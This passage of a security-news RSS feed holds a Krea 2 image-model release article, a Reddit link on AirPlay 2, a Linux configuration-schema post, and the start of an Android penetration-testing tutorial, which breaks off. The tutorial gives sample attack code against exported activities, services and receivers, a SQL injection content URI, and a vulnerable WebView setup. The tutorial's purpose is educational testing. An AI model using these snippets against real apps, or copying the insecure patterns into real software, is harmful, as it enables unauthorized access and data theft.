Turbo</b></p></td><td><p><b>Krea</b></p></td><td><p><b>2.0 seconds</b></p></td><td><p><b>Open Weights / Proprietary Hybrid.</b></p><p><b> Available via platform trial or API.</b></p></td><td><p><b>Maintains the base model's compatibility with style references and LoRAs while utilizing Trajectory Distribution Matching (TDM) to accelerate the creative ideation loop.</b></p></td></tr><tr><td><p>Midjourney v8.1 (Turbo Mode)</p></td><td><p>Midjourney</p></td><td><p>3 – 6 seconds </p></td><td><p>Proprietary. Commercial use requires an active Standard, Pro, or Mega tier subscription. </p></td><td><p>Delivers generation speeds "three times faster than v8" while maintaining the model's signature "painterly realism with sophisticated lighting," though it requires a "higher credit cost". </p></td></tr><tr><td><p>FLUX.2 [klein] 4B</p></td><td><p>Black Forest Labs</p></td><td><p>3.9 seconds</p></td><td><p>Open Weights.</p><p> Permissive commercial use.</p></td><td><p>The lightweight 4-billion parameter variant of the FLUX.2 architecture, balancing prompt adherence with high-speed generation.</p></td></tr><tr><td><p>FLUX.2 [klein] 9B</p></td><td><p>Black Forest Labs</p></td><td><p>4.6 seconds</p></td><td><p>Open Weights.</p><p> Permissive commercial use.</p></td><td><p>The medium-weight 9-billion parameter open model. It scales up compositional intelligence while keeping generation firmly under the 5-second barrier.</p></td></tr><tr><td><p>MAI Image 2 Efficient</p></td><td><p>Microsoft</p></td><td><p>4 – 7 seconds </p></td><td><p>Proprietary. Commercial use requires consumption-based API billing via Azure AI Foundry. </p></td><td><p>A throughput-optimized variant explicitly designed to "out-pace Google’s Imagen Flash". It makes a slight trade-off in detail for "substantially lower latency" that suits "automated pipelines" perfectly. </p></td></tr><tr><td><p>Midjourney v8.1 (Fast Mode)</p></td><td><p>Midjourney</p></td><td><p>5 – 9 seconds </p></td><td><p>Proprietary. Commercial use requires an active Standard, Pro, or Mega tier subscription. </p></td><td><p>The standard operational mode for v8.1. Average wait times "consistently lands below 10 seconds for most prompts" while offering "excellent handling of complex multi-element scenes". </p></td></tr><tr><td><p>FLUX.2 [dev]</p></td><td><p>fal.ai / DeepInfra</p></td><td><p>6.1 – 6.4 seconds</p></td><td><p>Open Weights (Non-Commercial).</p><p> Strictly for research and non-commercial development.</p></td><td><p>The developer-focused research model. API endpoint optimizations cause slight variance, with fal.ai operating at 6.1 seconds and DeepInfra at 6.4 seconds.</p></td></tr><tr><td><p>Midjourney v8.1 (Relax Mode)</p></td><td><p>Midjourney</p></td><td><p>8 – 14 seconds </p></td><td><p>Proprietary. Commercial use requires an active Standard, Pro, or Mega tier subscription. </p></td><td><p>Processes standard 1024x1024 resolution images without consuming fast GPU hours. The model retains "strong compositional instincts" and "consistent color grading and mood". </p></td></tr><tr><td><p>FLUX.2 [pro]</p></td><td><p>Black Forest Labs</p></td><td><p>11.1 seconds</p></td><td><p>Proprietary.</p><p> Commercial rights require paid API consumption.</p></td><td><p>The closed, professional-grade tier. It drops extreme step-distillation to prioritize high-fidelity commercial rendering and strict spatial alignments.</p></td></tr><tr><td><p>Seedream 4.0</p></td><td><p>BytePlus</p></td><td><p>11.6 seconds</p></td><td><p>Proprietary.</p><p> Commercial use via BytePlus enterprise contracts.</p></td><td><p>The base commercial generation model for the Seedream architecture, focused on reliable, standard-resolution outputs.</p></td></tr><tr><td><p>MAI Image 2 Standard</p></td><td><p>Microsoft</p></td><td><p>12 – 20 seconds </p></td><td><p>Proprietary. Commercial use requires consumption-based API billing via Azure AI Foundry. </p></td><td><p>Operates as a "full-quality output optimized for photorealism". It acts as a literal renderer, delivering "high-fidelity skin tones and material textures" and "strong literal prompt adherence". </p></td></tr><tr><td><p>Nano Banana Pro (Gemini 3 Pro Image)</p></td><td><p>Google DeepMind</p></td><td><p>17.7 seconds</p></td><td><p>Proprietary.</p><p> Commercial rights granted via Gemini API terms.</p></td><td><p>Prioritizes exact semantic accuracy and prompt adherence through an extended reasoning phase, trading raw speed for complex contextual execution.</p></td></tr><tr><td><p>Seedream 4.5</p></td><td><p>BytePlus</p></td><td><p>18.2 seconds</p></td><td><p>Proprietary.</p><p> Commercial use via BytePlus enterprise contracts.</p></td><td><p>The upgraded high-fidelity variant, requiring an additional 6.6 seconds of compute time over the 4.0 version to refine complex textures and text rendering.</p></td></tr><tr><td><p>Krea 2 Large</p></td><td><p>Krea</p></td><td><p>23.7 seconds</p></td><td><p>Proprietary / Open Weights.</p><p> Commercial rights depend on deployment.</p></td><td><p>The un-distilled foundation model. It ignores the speed-focused Trajectory Distribution Matching of the Turbo variant to maximize aesthetic polish and structural stability.</p></td></tr><tr><td><p>FLUX.2 [max]</p></td><td><p>Black Forest Labs</p></td><td><p>25.6 seconds</p></td><td><p>Proprietary.</p><p> Closed enterprise API.</p></td><td><p>The heaviest parameter model in the FLUX lineup. It operates exclusively as a deep reasoning renderer for complex commercial assets.</p></td></tr><tr><td><p>GPT-Image-2</p></td><td><p>OpenAI</p></td><td><p>200.8 seconds</p></td><td><p>Proprietary.</p><p> Full commercial usage under standard OpenAI terms.</p></td><td><p>A massive outlier in the latency landscape. It dedicates over three minutes to complex, multi-step semantic reasoning, likely utilizing an expansive chain-of-thought process prior to finalizing pixel outputs.</p></td></tr></tbody></table><p><i>Sources: </i><a href="https://artificialanalysis.ai/image/models"><i>Artificial Analysis</i></a><i>, </i><a href="https://www.krea.ai/blog/krea-2-turbo"><i>Krea</i></a><i>, </i><a href="https://www.mindstudio.ai/blog/midjourney-v8-1-vs-microsoft-mai-image-2"><i>MindStudio.AI</i></a><i></i></p><h2><b>Architectural bifurcation and the 12B parameter Transformer</b></h2><p>At the <a href="https://www.krea.ai/blog/krea-2-technical-report">technical core</a> of the release sits an architectural framework built entirely from scratch: a Diffusion Transformer scaled to 12 billion parameters. </p><p>Rather than deploying a single, heavily fine-tuned model for all downstream tasks, Krea open-sources two highly differentiated checkpoints captured at distinct milestones of the model's training lifecycle.</p><p>Departing from multi-stream configurations for structural clarity, the core engine standardizes on a single-stream transformer block architecture wherein attention and MLP layers are shared natively between text and image tokens. </p><p>To maximize computational efficiency, Krea incorporates a SwiGLU MLP layer operating at a 4x expansion factor alongside Grouped-Query Attention (GQA) combined with gated sigmoid attention layers to stabilize training dynamics. </p><p>Timestep conditioning is heavily optimized; the network replaces traditional per-block MLP modules with a lightweight, per-block tunable bias term, successfully cutting total block modulation parameters by 20% to 30% and reallocating that parameter budget directly into core layers. </p><p>Positional encoding is managed via a 3D Axial Rotary Position Embedding (RoPE) scheme mapping across individual frame, height, and width coordinate</p><p><b>Krea 2 Raw </b>represents an undistilled base release checkpoint taken directly from the mid-training stage of the larger Krea 2 Medium development cycle. </p><p>Because it lacks post-training alignment, reinforcement learning from human feedback (RLHF), or final aesthetic distillation, Krea 2 Raw functions as a blank canvas. </p><p>It retains a vast, uncurated latent space that makes it poorly suited for immediate out-of-the-box prompting, but highly optimized for structural training. </p><p>Operating this model via the Hugging Face `diffusers` library requires a heavy compute footprint, executing via `Krea2Pipeline` in `torch.bfloat16` precision across 52 inference steps with a guidance scale of 3.5.</p><p>To accelerate early-stage architectural convergence during the first epoch of this 256px baseline training phase, Krea applied internal Representation Alignment (iREPA) techniques before decoupling them to let the underlying model develop independent structural representations.</p><p>The second checkpoint, <b>Krea 2 Turbo,</b> represents the opposite end of the optimization spectrum. </p><p>It is a distilled, post-trained variant derived from Krea 2 Medium. Through knowledge distillation, the network's complex multi-step generation sequence is compressed into an incredibly lean operational profile. </p><p>Krea 2 Turbo slashes the required generation cycle down to just 8 inference steps with a guidance scale of 0.0, enabling it to render native 2k resolution imagery on standard consumer-grade hardware in <b>approximately 2 seconds.</b></p><p>The underlying latent representations for both models are optimized through the integration of the Qwen Image VAE and the FLUX 2 VAE to guarantee rapid convergence while maintaining high reconstruction fidelity.</p><h2><b>Data and training</b></h2><p>The underlying dataset strategy for the Krea 2 family relies on a hybrid blend of publicly harvested data, third-party licensed image repositories, and highly curated synthetic datasets built via proprietary generation methods. </p><p>Prior to final training, Krea processed these collections through rigorous algorithmic filters designed to strip out duplicative frames, low-resolution media, and explicit or harmful material, ensuring high fidelity and strong prompt compliance across both models.</p><p>Krea enforces a <i>zero-synthetic data policy</i> within its primary pretraining mix. </p><p>To prevent the upper-bound quality limitations and output biases induced by AI-generated data, the engineering team deployed custom in-house filtering classifiers built on top of DINOv3 and SigLIP-2 architectures to completely purge synthetic images at scale. </p><p>Furthermore, rather than using traditional model-based aesthetic filters that inadvertently strip away artistic intents like motion blur, Krea preserves wide stylistic boundaries. </p><p>The team trained a Sparse Autoencoder (SAE) on SigLIP-2 embeddings to isolate and filter out genuine visual artifacts using an unsupervised tagging framework. </p><h2><b>Krea 2 Raw vs. Krea 2 Turbo: Distinctions and use cases</b></h2><p>The release establishes a highly deliberate operational paradigm for professional studios and independent creators: "train on Raw, generate with Turbo." This workflow leverages the unique architectural properties of both open-weight files to optimize both training accuracy and rendering speed.</p><p>In creative production pipelines, engineers can use Krea 2 Raw to train custom Low-Rank Adaptations (LoRAs) or domain-specific fine-tunes. </p><p>Because the Raw checkpoint contains no baked-in stylistic opinions or aggressive post-training constraints, it absorbs unique aesthetic directions—such as architectural drafting styles, specific brand assets, or complex lighting designs—with high fidelity and zero stylistic interference. </p><p>Once the training phase is complete, creators can port those exact LoRAs directly over to Krea 2 Turbo.</p><p>This methodology is reflected in Krea's own development ecosystem, which hosts an in-house collection of custom LoRAs trained entirely on the Raw foundation model but optimized for execution within Turbo workflows. </p><p>On the user-facing application layer, Krea integrates this dual-engine setup with a powerful style transfer system. Rather than relying on erratic text descriptions to achieve an artistic look, users can feed multiple style reference images directly into the system. </p><p>Krea 2 maps these references across its latent space, allowing creators to isolate individual aesthetic components, combine distinct moodboards, adjust style strength via generative sliders, and fine-tune batch variation levels to maintain visual cohesion across large-scale design iterations.</p><p>To address the gap between raw textual training captions and brief user inputs, Krea paired this suite with an advanced LLM Prompt Expander. Refined via Generalized Deep Q-Network Preference Optimization (GDPO) and trained on synthetic thinking traces to preserve intent reconstruction, the expander applies a photographic-medium bias to photorealistic requests and integrates an active DINOv3 embedding diversity score across rollout groups to prevent automated prompting routines from collapsing into a singular house style.</p><p>While Krea 2 Medium and Krea 2 Large remain the company's flagship models for high-fidelity composition and absolute stylistic adherence, Turbo fills the critical role of rapid visual ideation. </p><p>It serves as an interactive scratchpad for early concept creation, quick prompt experimentation, and iterative art direction where near-instantaneous feedback loops are required to maintain creative momentum.</p><h2><b>The custom license and its particulars</b></h2><p>The open-weight assets deploy under the <a href="https://huggingface.co/krea/Krea-2-Raw/blob/main/LICENSE.pdf">Krea 2 Community License Agreemen</a>t operating alongside an official Acceptable Use Policy. </p><p>At a macro level, this legal framework mirrors recent industry trends toward commercial-use permissions that target small businesses while restricting large enterprise exploitation. </p><p>The license explicitly permits individuals, independent creators, and <i>small</i> commercial companies to build applications, monetize generated imagery, and integrate the open weights directly into commercial software products without royalty obligations. </p><p>Furthermore, Krea states that it "does not claim copyright or other intellectual property rights over content generated by users of this model," leaving output ownership entirely in the hands of the operator.</p><p>For organizations scaling beyond this baseline, the ecosystem shifts into a paid, custom-tier structure. </p><p>While Krea's official documentation lacks a rigid revenue threshold defining a "large enterprise," the company structurally demarcates the boundary based on organizational footprint: standard commercial usage caps at a "Business" tier accommodating up to 50 seats. </p><p>Therefore, any entity requiring more than 50 seats, Single Sign-On (SSO) integrations, guaranteed Service Level Agreements (SLAs), or custom Data Processing Agreements (DPAs) qualifies as an Enterprise. </p><p>These larger entities fall outside the free Community License scope and must pay for a custom commercial license—operating under "Custom Terms of Service"—negotiated directly with Krea's sales team. </p><p>Additionally, developer access to Krea's official API remains entirely decoupled from the open-weights release; API usage operates as a distinct, paid service billed dynamically on a per-generation basis (measured in microdollars) and requires a prepaid USD balance independent of standard monthly compute subscriptions.</p><p>However, a close examination reveals a significant structural shift regarding legal and behavioral compliance for all self-hosted deployments. </p><p>Unlike traditional open-source permissions like the MIT or Apache 2.0 licenses—which grant unconditional usage rights and completely waive liability—the Krea 2 Community License implements strict downstream behavioral guardrails.</p><p>Because Krea relinquishes centralized control over the downstream deployment of its open weights, the contract legally binds deployers to enforce content moderation protocols at the infrastructure layer. </p><p>Under the terms of the agreement, any developer or platform hosting Krea 2 models must implement active input/output classifiers or equivalent content filtering mechanisms to actively prevent the generation of illegal materials, non-consensual intimate imagery (NCII), child sexual abuse material (CSAM), or defamatory assets. </p><p>Developers who fail to deploy these defensive safety layers stand in immediate breach of contract, giving Krea the explicit right to update model weights or revoke access to the model family entirely.</p><h2><b>Background on Krea</b></h2><p>Founded in 2022 by audiovisual systems engineering dropouts Víctor Perez and Diego Rodriguez Prado, San Francisco-based Krea initially captured market traction as a highly fluid user interface layer built to orchestrate disparate, third-party AI generative engines. </p><p>The startup's rapid scaling via product-led adoption culminated in an aggregate<a href="https://techcrunch.com/2025/04/07/kreas-founders-snubbed-postgrad-grants-from-the-king-of-spain-to-build-their-ai-startup-now-its-valued-at-500m/"> $83 million </a>in disclosed venture capital funding from major VCs including Andreessen Horowitz and Bain Capital Ventures, as well as early-stage institutional backers including Pebblebed, Abstract Ventures, and Gradient Ventures.</p><p>The company's user base surpassed <a href="https://www.krea.ai/">30 million individuals across 191 countries as of June 2026</a>, according to its website. </p><p>The open-weights launch of the Krea 2 model family represents the culmination of Krea’s deliberate evolution from a multi-model SaaS aggregator into a self-sustaining media research lab. </p><p>Early in its lifecycle, Krea focused on building workflow tools, editing systems, and a node-based automation pipeline that allowed digital artists to unify models from competitors like Runway, Midjourney, and Adobe under a single subscription. </p><p>However, to insulate itself against upstream platform dependencies and supplier margin pressures, the company aggressively shifted toward developing proprietary architectures. This transition began taking public shape in July 2025 with the open-weights release of the custom-curated FLUX.1 Krea checkpoint, followed in October 2025 by Krea Realtime 14B—an autoregressive video model distilled from Wan 2.1 capable of rendering 11 frames per second on localized enterprise hardware.</p><p>This underlying technical maturation parallels Krea's accelerating push into high-end enterprise workflows. Large-scale creative production operations have shifted toward treating Krea as core creative infrastructure; for example, the digital creative services platform </p><p><a href="https://www.youtube.com/watch?v=OLNbn4L2fUM">Superside reported migrating workflows</a> from fragmented open-source setups to route roughly 80 percent of its total AI generative production through Krea. </p><p>Furthermore, Krea established a strategic co-development partnership with Copenhagen-headquartered architecture firm <a href="https://henninglarsen.com/news/we-re-partnering-with-krea">Henning Larsen</a> to build highly restricted, domain-specific design tools tuned to meet the compliance frameworks mandated by the EU AI Act. </p><p>By releasing Krea 2 Raw and Turbo as open weights, Krea is continuing its expansion from an AI tools provider to being a model provider in its own right.</p><h2><b>An alternative to typical rigid AI imagery APIs?</b></h2><p>Creators are focusing heavily on the structural freedom offered by the unaligned Raw checkpoint, viewing it as an important alternative to the locked-down APIs provided by closed-source models.</p><p>Through the<a href="https://x.com/krea_ai/status/2069435590995812396"> official announcement on X,</a> Krea emphasized the foundational shift this launch represents for open AI workflows.</p><p>Developers note that by treating AI as an "actual creative medium" that feels "raw, flexible, unopinionated, and unconstrained," Krea is intentionally providing an infrastructure that creators can "break if [they] want to," moving far away from the rigid safety guardrails that frequently limit the visual range of competing enterprise tools.</p><p>As independent model builders begin compiling the Hugging Face repositories, the practical value of the release will be determined by how effectively the open-source community can scale customized LoRAs using Krea 2 Raw.</p><p>By providing clear commercial terms and lowering hardware entry barriers via Turbo's 8-step inference pipeline, Krea has introduced a highly competitive alternative to the open-weights market, challenging dominant models by prioritizing artistic control over centralized corporate alignment.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AirPlay 2 realtime audio sender, the encrypted RAOP/RTSP path reconstructed and documented]]></title>
<description><![CDATA[submitted by    /u/Dangerous-Section567   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3616918/reverse-engineering/airplay-2-realtime-audio-sender-the-encrypted-raoprtsp-path-reconstructed-and-documented/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616918/reverse-engineering/airplay-2-realtime-audio-sender-the-encrypted-raoprtsp-path-reconstructed-and-documented/</guid>
<pubDate>Tue, 23 Jun 2026 02:07:52 +0200</pubDate>
<category>🕵️ Reverse Engineering</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/Dangerous-Section567"> /u/Dangerous-Section567 </a> <br> <span><a href="https://github.com/akustikrausch/airplay2-sender-cpp">[link]</a></span>   <span><a href="https://www.reddit.com/r/ReverseEngineering/comments/1ucf0hr/airplay_2_realtime_audio_sender_the_encrypted/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[A feature hidden in a config file might as well not exist. Could a universal schema fix this?]]></title>
<description><![CDATA[I've been thinking about what still holds Linux desktop adoption back, and I don't think it's features anymore. Linux already has an absurd amount of functionality. PipeWire alone supports things like advanced routing, crossovers, channel remapping, latency tuning, spatial audio, virtual devices,...]]></description>
<link>https://tsecurity.de/de/3600404/linux-tipps/a-feature-hidden-in-a-config-file-might-as-well-not-exist-could-a-universal-schema-fix-this/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600404/linux-tipps/a-feature-hidden-in-a-config-file-might-as-well-not-exist-could-a-universal-schema-fix-this/</guid>
<pubDate>Tue, 16 Jun 2026 02:11:16 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I've been thinking about what still holds Linux desktop adoption back, and I don't think it's features anymore.</p> <p>Linux already has an absurd amount of functionality. PipeWire alone supports things like advanced routing, crossovers, channel remapping, latency tuning, spatial audio, virtual devices, and much more. BlueZ has a ton of Bluetooth settings. NetworkManager, iSCSI, power management, storage, and networking tools all have capabilities most users never discover.</p> <p>The problem is that most of these features are hidden behind config files, terminal commands, or documentation rabbit holes.</p> <p>A feature that requires editing <code>/etc/something.conf</code> might as well not exist for 99% of users.</p> <p>My idea isn't to replace existing configuration systems. Every project could continue using whatever it already uses internally. The only thing I'd like to see is a common way to expose configurable parameters and capabilities.</p> <p>Imagine every project optionally publishing a simple schema describing:</p> <ul> <li>parameter name</li> <li>type</li> <li>valid values</li> <li>description</li> <li>complexity level</li> </ul> <p>Then KDE, GNOME, or any other frontend could automatically generate configuration interfaces.</p> <p>The concept already exists elsewhere. Home Assistant discovers entities and builds interfaces around them. OpenAPI can generate clients and documentation from schemas. Kodi has Basic, Standard, Advanced, and Expert modes.</p> <p>The last one is especially interesting. One thing Linux often gets wrong is that applications either expose everything or almost nothing.</p> <p>Imagine:</p> <p><strong>Basic</strong></p> <ul> <li>Output device</li> <li>Volume</li> <li>Sample rate</li> </ul> <p><strong>Advanced</strong></p> <ul> <li>Channel remapping</li> <li>Crossover</li> <li>Latency tuning</li> </ul> <p><strong>Expert</strong></p> <ul> <li>Graph configuration</li> <li>Realtime scheduling</li> <li>Internal PipeWire parameters</li> </ul> <p>The backend wouldn't change. The config files wouldn't change. The user would just gain a consistent way to discover what the system is capable of.</p> <p>For software that doesn't implement the schema, adapters could be written. A BlueZ adapter could edit Bluetooth configs. An iSCSI adapter could expose targets, sessions and discovery through the same interface. Legacy software could still participate without upstream modifications.</p> <p>I genuinely think Linux has reached a point where discoverability is a bigger problem than missing functionality.</p> <p>A lot of developers spend months implementing powerful features that end up being used by maybe 0.1% of users simply because nobody knows they exist.</p> <p>Am I missing something obvious, or has this already been attempted before?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/RychardDavid"> /u/RychardDavid </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1u6xkgp/a_feature_hidden_in_a_config_file_might_as_well/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1u6xkgp/a_feature_hidden_in_a_config_file_might_as_well/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android App Penetration Testing: From APK Decompilation to Runtime Exploitation [Tools and Labs]]]></title>
<description><![CDATA[Hello, everyone. I hope you are well.بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِIn this article, I’ll cover the basics of Android penetration testing, including the required tools and how to use them. I’m not an expert Android penetration tester, but I hope you find this article useful.Before I star...]]></description>
<link>https://tsecurity.de/de/3591576/hacking/android-app-penetration-testing-from-apk-decompilation-to-runtime-exploitation-tools-and-labs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591576/hacking/android-app-penetration-testing-from-apk-decompilation-to-runtime-exploitation-tools-and-labs/</guid>
<pubDate>Thu, 11 Jun 2026 20:39:31 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><strong>Hello, everyone. I hope you are well.</strong></p><p><strong>بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ</strong></p><p>In this article, I’ll cover the <strong>basics of Android penetration testing</strong>, including the <strong>required tools and how to use them</strong>. I’m not an expert Android penetration tester, but I hope you find this article useful.</p><p>Before I start talking about Android penetration testing tools, we need to start with an <strong>Android virtual device</strong>, OR a <strong>physical device</strong>, to work.</p><p><strong>Android Studio</strong> is the official <strong>Integrated Development Environment (IDE)</strong> for Android app development, developed by <strong>Google</strong>. It provides all the tools developers need to create, test, and debug Android apps, and it supports running apps on <strong>physical devices</strong> and <strong>emulators</strong>.</p><p>I’m using Android Studio to create an AVD (Android Virtual Device), but there <strong>are other Android emulators you can use, such as </strong><a href="https://www.genymotion.com/"><strong>Genymotion</strong></a><strong>, which is also good and easy to use.</strong></p><p><strong>In Android Studio</strong>,<strong> create an AVD </strong>to work with. I’m using Android 13 with the x86_64 CPU architecture (ABI). After you create the AVD — regardless of which emulator you choose — we’ll move on to the tools and discuss each one in detail.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Uw_7c2__3zQ2ORnlsb_tQw.png"></figure><h3>— — Some Idioms and Important Things: — —</h3><p><strong>Firstly</strong>, we need to cover some basic concepts.</p><blockquote><strong>AndroidManifest.xml: </strong>Think of it as the app’s identity card and configuration file for the Android operating system. Before the system can run any of your app’s code, it must read the manifest to understand what the app is, what components it has, and what permissions it needs.</blockquote><h3>Insecure storage: SharedPreferences, DBs, files, external storage:</h3><p>It means <strong>sensitive data</strong> (auth tokens, passwords, API keys, PII, JWTs, encryption keys, etc.) is stored on-device in a way an attacker or another app can read or modify.</p><p>Common<strong> Android storage</strong> places:</p><ul><li><strong>SharedPreferences:</strong> key/value XML files usually used for settings, Ex, /data/data/&lt;package_name&gt;/shared_prefs/</li><li><strong>SQLite databases:</strong> structured app data Ex: /data/data/&lt;package_name&gt;/databases/</li><li><strong>Cache directory:</strong>/data/data/&lt;package_name&gt;/cache/</li><li><strong>External storage:</strong> /storage/emulated/0/</li><li><strong>Logs</strong>: not strictly storage, but sensitive info in <strong>logs</strong>.</li></ul><h3>Activities:</h3><p><strong>Represents</strong> UI screens that users interact with; each <strong>activity</strong> can be started via an <strong>intent</strong> by the same app or another app.</p><ul><li><strong>Potential Security Issue: Exported</strong> activities can be accessed by <strong>other</strong> <strong>apps</strong> if not restricted. An attacker can invoke internal(sensitive) activities to make them public.</li><li><strong>Example: </strong>Suppose an app that has</li></ul><pre>&lt;activity android:name=".AdminActivity"<br>          android:exported="true"&gt;<br>&lt;/activity&gt;</pre><p>If this activity allows <strong>admin-</strong>only functions like Create, Update, and delete users, and it doesn’t check <strong>authentication</strong> <strong>internally</strong>. An attacker can create a malicious app and <strong>send</strong> an <strong>intent</strong> to it because the exported activity is <strong>true</strong>, like</p><pre>Intent i = new Intent();<br>i.setClassName("com.victim.app", "com.victim.app.AdminActivity");<br>startActivity(i);</pre><h3>Services:</h3><p>Perform background operations like playing music or downloading data; they can <strong>run</strong> even if <strong>no activity is visible</strong>.</p><ul><li><strong>Potential Security Issue: Exported</strong> services can be started or bound by <strong>other apps</strong> <strong>&amp; </strong>attacker can perform actions like <strong>sending</strong> <strong>data</strong> <strong>indirectly</strong>.</li><li><strong>Example: </strong>Suppose we have an UploadService that uploads a user file to the server without any other internal checks.</li></ul><pre>&lt;service android:name=".UploadService"<br>         android:exported="true" /&gt;</pre><p>The <strong>attacker's</strong> malicious app can send any file to upload, like the following</p><pre>Intent intent = new Intent();<br>intent.setClassName("com.victim.app", "com.victim.app.UploadService");<br>intent.putExtra("file", "/data/data/com.victim.app/userinfo.db");<br>startService(intent);</pre><h3>Broadcast Receivers:</h3><p><strong>Respond</strong> to system-wide or app messages like <strong>battery low</strong> or SMS_Received.</p><ul><li><strong>Potential Security Issue: Unprotected receivers</strong> can be triggered by <strong>malicious broadcasts</strong>. If they perform sensitive actions like deleting files or sending data.</li><li><strong>Example: If </strong>we have a <strong>Receiver</strong>, it <strong>resets</strong> the app data</li></ul><pre>&lt;receiver android:name=".ResetReceiver"<br>          android:exported="true"&gt;<br>    &lt;intent-filter&gt;<br>        &lt;action android:name="com.victim.RESET_APP"/&gt;<br>    &lt;/intent-filter&gt;<br>&lt;/receiver&gt;</pre><p>An <strong>attacker's malicious app </strong>can send things like the following to reset it.</p><pre>Intent i = new Intent("com.victim.RESET_APP");<br>sendBroadcast(i</pre><h3>Content providers:</h3><p><strong>Managed</strong> structured data like <strong>databases</strong> or files, and allowed <strong>sharing</strong> data between <strong>apps</strong> using the URI content://&lt;authority&gt;/&lt;path&gt;/&lt;id&gt;</p><ul><li><strong>Potential Security Issue:</strong> Can lead to<strong> SQL injection </strong>vulnerabilities via<strong> </strong>unchecked <strong>URI</strong> <strong>parameters</strong> OR <strong>Path traversal</strong> in file-based providers.</li><li><strong>Example: Suppose</strong> that we have a content provider that <strong>returns</strong> user data via an <strong>ID</strong> that exists in the <strong>URI</strong>.</li></ul><pre>&lt;provider android:name=".UserDataProvider"<br>          android:authorities="com.victim.app.provider"<br>          android:exported="true" /&gt;</pre><pre>Cursor c = db.rawQuery("SELECT * FROM users WHERE id=" + uri.getLastPathSegment(), null);</pre><p>An <strong>attacker</strong> can get <strong>SQL</strong> injection to <strong>get</strong> <strong>all</strong> <strong>user</strong> <strong>data</strong> by querying</p><pre>content://com.victim.app.provider/users/1 OR 1=1--</pre><h3>Web Views:</h3><p>It is an Android component that allows you to display <strong>web content</strong> directly <strong>within your app</strong>, and it can lead to different vulnerabilities. If you look for the following <strong>Java code</strong>, you will notice that you can execute JavaScript(<strong>XSS</strong>) and access internal files(<strong>LFI</strong>) because you enabled JavaScript and file access to true.</p><pre>// Vulnerable (Java)<br>WebView webView = findViewById(R.id.webview);<br>WebSettings s = webView.getSettings();<br><br>// Dangerous combination: JS + file access<br>s.setJavaScriptEnabled(true);<br>s.setAllowFileAccess(true);<br>s.setAllowFileAccessFromFileURLs(true);<br>s.setAllowUniversalAccessFromFileURLs(true);<br><br>// Loads a user-editable local file (attacker could place/modify this file)<br>webView.loadUrl("file:///sdcard/app_data/user_note.html");</pre><h3>Root Detection:</h3><p><strong>Root</strong> refers to the system-level (<strong>superuser</strong>) account. It’s equivalent to the <strong>Administrator</strong> account in Windows or the <strong>root</strong> account in Linux. <strong>Root detection</strong> is an expected security mechanism in Android apps that secures the device’s integrity. <strong>Rooting[Root detection bypass] </strong>a device gives users administrative privileges, allowing them to bypass certain security features, giving them <em>power</em> over the device, allowing them to read/modify app memory and files, intercept/alter network traffic, remove protections, and persist privileged malware.</p><h3>SSL Pinning:</h3><p><strong>SSL/TLS (HTTPS)</strong> normally trusts any certificate chain that the device’s trusted CA store accepts.<strong>SSL pinning</strong> is when an app says, “I will only <strong>trust</strong> <em>this</em> certificate (or public key/intermediate), regardless of what the <strong>OS</strong> <strong>trusts</strong>. <strong>Attackers</strong> attempt to bypass pinning to <strong>read sensitive data in transit</strong> — capture tokens, passwords, and PII. <strong>Modify requests/responses.</strong></p><h3>=============Tools And Labs ==============</h3><h3>ADB:</h3><p><strong>Android Debug Bridge</strong> is a command-line tool that lets you communicate with a device. The The adb command facilitates a variety of device actions, such as installing and debugging apps. adb provides access to a Unix shell that you can use to run a variety of commands on a device. It is a client-server program</p><p>You can use ADB after installing the Android SDK Command-line Tools, which include ADB. You can also use it with your physical device. For more details, refer to the official documentation: <a href="https://developer.android.com/tools/adb"><strong>https://developer.android.com/tools/adb</strong></a></p><p>I’m going to talk about the important commands used with the <strong>adb</strong>.</p><ul><li><strong>lists</strong> all connected <strong>devices</strong> adb devices</li><li><strong>Install APK</strong> files directly to your device using ADB adb install &lt;path_to_apk&gt;</li><li><strong>Starts a remote shell</strong> connection to your Android device adb shell <strong>&amp;&amp; Reboot</strong> the device adb reboot</li><li><strong>Copies</strong> a file from your computer to the Android device adb push &lt;local_file_path&gt; &lt;device_file_path&gt;<strong>&amp;&amp; Copies</strong> a file from your device to the computer adb pull &lt;device_file_path&gt; &lt;local_file_path&gt;</li><li><strong>Getting</strong> all the <strong>logs</strong> of your Android using adb logcat</li><li><strong>Lists</strong> the <strong>package names</strong> of all installed apps adb shell pm list packages</li><li><strong>Launches</strong> a specific activity in an app adb shell am start -n &lt;package_name&gt;/&lt;activity_name&gt;<strong>EX:</strong> adb shell am start -n com.android.settings/.Settings</li><li><strong>Other</strong> important commands -&gt; <a href="https://developer.android.com/tools/adb"><strong><em>https://developer.android.com/tools/adb</em></strong></a></li></ul><h3>APKtool:</h3><p>It is an essential tool for anyone who needs to <strong>reverse engineer</strong>, analyze, or <strong>modify</strong> Android applications (<strong>APK files</strong>). It <strong>decompiles</strong> an APK file back to <em>almost</em> its <strong>original</strong> form, and <strong>Recompiles</strong> an APK file: After you have made changes to the decoded files, Apktool can <strong>rebuild</strong> them into a <strong>new APK</strong> file. You can install it from the following: <a href="https://apktool.org/docs/install/"><strong><em>https://apktool.org/docs/install/</em></strong></a></p><p>I will walk you through a real example from the <a href="https://github.com/satishpatnayak/AndroGoat"><strong>Androgoat</strong></a> lab to show how to use the <strong>apktool command </strong>with another <strong>GUI</strong> tool like <a 